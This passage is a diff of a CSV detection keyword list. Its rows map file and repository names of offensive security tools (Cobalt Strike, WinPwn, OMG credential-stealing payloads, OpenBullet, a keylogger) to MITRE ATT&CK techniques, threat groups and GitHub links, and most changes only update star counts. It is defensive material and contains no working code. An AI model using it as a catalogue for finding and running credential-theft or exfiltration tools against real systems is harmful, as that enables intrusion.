T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*OffensiveCSharp*DriverQuery*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp*ETWEventSubscription*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp-master*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*office2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*office365userenum.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Office-DDE-Payloads*","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","624","162","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" +"*Offline_WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*offsecginger/koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*OG-Sadpanda/SharpCat*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" @@ -14320,11 +14485,11 @@ "*OLDNamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*OleViewDotNet.psd1*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*OlivierLaflamme/PyExec*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" -"*-OMG-Credz-Plz*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*OMGdump.zip*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*OMGLoggerDecoder*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*omg-payloads*/payloads/*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*omg-payloads-master*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*-OMG-Credz-Plz*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OMGdump.zip*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OMGLoggerDecoder*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads*/payloads/*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads-master*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*OmriBaso/BesoToken*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*On_Demand_C2.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*On-Demand_C2_BOF.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" @@ -14332,7 +14497,7 @@ "*onecloudemoji/CVE-2022-30190*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*OneDrive Enumerator*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" "*onedrive_enum.py*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" -"*onedrive_exports_version_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*onedrive_exports_version_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "*onedrive_user_enum.git*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" "*One-Lin3r*","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/One-Lin3r","1","1","N/A","N/A","10","1596","307","2022-02-10T18:17:57Z","2018-01-14T21:26:04Z" "*onesixtyone -c *snmp_default_pass.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -14345,19 +14510,19 @@ "*openBeaconBrowser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*openbsd_softraid2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openbsd_softraid2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*OpenBullet.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.pdb*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.sln*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openbullet/openbullet*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*OpenBullet2.Console.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2.Native.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2.Native.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*openbullet2:latest*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Console.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*openbullet2:latest*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*OpenBulletApp.cs*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" @@ -14374,56 +14539,56 @@ "*openPortScanner*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 